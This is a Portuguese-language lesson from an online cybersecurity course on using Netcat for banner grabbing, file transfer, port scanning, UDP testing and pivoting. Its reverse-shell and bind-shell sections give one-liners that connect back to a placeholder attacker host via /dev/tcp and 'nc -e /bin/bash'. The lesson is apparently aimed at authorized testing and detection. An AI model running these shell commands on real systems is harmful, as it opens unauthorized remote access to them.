0Pricing
Cyber Security Academy · Aula

Netcat: o Canivete Suíço

Use nc para obter banners, transferir arquivos, encaminhar portas e criar shells reversos simples.

Netcat: o Canivete Suíço é uma aula grátis de Cyber Security Academy no CoddyKit. Esta é a aula 3 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Cyber Security Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Cyber Security Academy inclui 4 aulas no total.

O que é o Netcat

O Netcat (nc) é um utilitário que lê e grava dados por meio de conexões de rede usando TCP ou UDP. Ele está instalado em praticamente todos os sistemas Unix e é indispensável para depuração, transferência de arquivos e exploração básica.

Conexão básica e captura de identificadores

Conecte-se a qualquer porta TCP para capturar o identificador do serviço e interagir manualmente com o protocolo. Esta é a forma mais simples de reconhecimento.

# Connect to port 80
nc 192.168.1.100 80
GET / HTTP/1.0
[Enter twice]

# Connect to SMTP
nc mail.example.com 25
# Returns: 220 mail.example.com ESMTP

Escuta em uma porta

O Netcat pode escutar conexões recebidas com -l -p. Isso é útil para testar a conectividade, capturar terminais reversos e receber arquivos.

# Listen on port 4444
nc -lvnp 4444

# -l listen
# -v verbose
# -n no DNS resolution
# -p port number

Transferência de arquivos com Netcat

O Netcat pode enviar arquivos encaminhando-os para uma conexão. O receptor escuta e redireciona a saída para um arquivo. Não há criptografia — use-o somente em redes confiáveis.

# Receiver (runs first):
nc -lvnp 4444 > received_file.txt

# Sender:
nc 192.168.1.10 4444 < file_to_send.txt

Varredura de portas com Netcat

O Netcat pode fazer uma varredura básica de portas com -z (modo sem entrada/saída) e -w (tempo limite). É mais lento que o Nmap, mas é útil quando o Nmap não está disponível.

# Scan ports 20-80
nc -zv 192.168.1.100 20-80 2>&1 | grep succeeded

# With timeout:
nc -zvw2 192.168.1.100 22 80 443

Terminal reverso simples

Um terminal reverso faz com que o alvo se conecte de volta ao invasor. Ele é útil em testes de intrusão quando as regras do firewall bloqueiam conexões de entrada para o alvo.

# Attacker listens:
nc -lvnp 4444

# Target executes (bash):
bash -i >& /dev/tcp/attacker_ip/4444 0>&1

# Or via nc:
nc attacker_ip 4444 -e /bin/bash

Terminal vinculado

Um terminal vinculado fica escutando na máquina-alvo. O invasor se conecta a ele. É menos comum nos testes de intrusão modernos, pois os firewalls geralmente bloqueiam conexões de entrada.

# On target: listen and serve a shell
nc -lvnp 5555 -e /bin/bash

# On attacker: connect
nc target_ip 5555

Modo UDP

Use -u para conexões UDP. Isso é útil para testar serviços UDP, como DNS (porta 53) e SNMP (porta 161).

# Test DNS over UDP
nc -u 8.8.8.8 53

# Test SNMP
nc -u 192.168.1.1 161

Uso de proxy com Netcat

O Netcat pode encadear conexões para permitir a movimentação entre redes. Combinado com canais nomeados (mkfifo), ele cria túneis bidirecionais simples sem ferramentas adicionais.

mkfifo /tmp/pipe
nc -lvnp 4445 < /tmp/pipe | nc internal_host 80 > /tmp/pipe

Ncat: a alternativa moderna

O Ncat (parte do Nmap) amplia o Netcat com suporte a SSL (--ssl), controle de acesso e modo intermediário. Prefira o Ncat para canais criptografados.

# SSL listener
ncat --ssl -lvnp 4444

# SSL connect
ncat --ssl target_ip 4444

Defensores: detecção do Netcat

As conexões do Netcat se parecem com conexões TCP normais. Os defensores podem detectá-lo monitorando nomes de processos (HIDS), observando portas de saída incomuns e identificando terminais iniciados por processos-pai inesperados.

Verificação rápida

Qual opção do Netcat habilita o modo de escuta?

Resumo: Netcat

O Netcat é uma ferramenta fundamental: use-o para capturar identificadores, transferir arquivos, testar a conectividade e entender a mecânica de terminais reversos e vinculados. Em testes de intrusão autorizados, ele valida regras de firewall e simula a movimentação do invasor entre redes. Conheça-o bem — tanto para usá-lo quanto para detectá-lo.

Perguntas Frequentes

A aula “Netcat: o Canivete Suíço” é grátis?

Sim — o texto completo de “Netcat: o Canivete Suíço” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Cyber Security Academy, atualize para CoddyKit PRO. O curso de Cyber Security Academy inclui 4 aulas no total.

O que vou aprender em “Netcat: o Canivete Suíço”?

Use nc para obter banners, transferir arquivos, encaminhar portas e criar shells reversos simples. Você pratica Cyber Security Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.

Preciso ter experiência prévia para começar Cyber Security Academy?

Nenhuma experiência prévia é necessária. Cyber Security Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 3 de 4.

Quanto tempo leva a aula “Netcat: o Canivete Suíço”?

A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.

Posso escrever e executar código nesta aula de Cyber Security Academy?

Sim. Cada aula de Cyber Security Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.

Todas as aulas deste curso

  1. Técnicas de Varredura de Portas com Nmap
  2. Identificação de Serviços e Sistemas Operacionais
  3. Netcat: o Canivete Suíço
  4. Criação de Scripts para Enumeração de Redes
← Voltar para Cyber Security Academy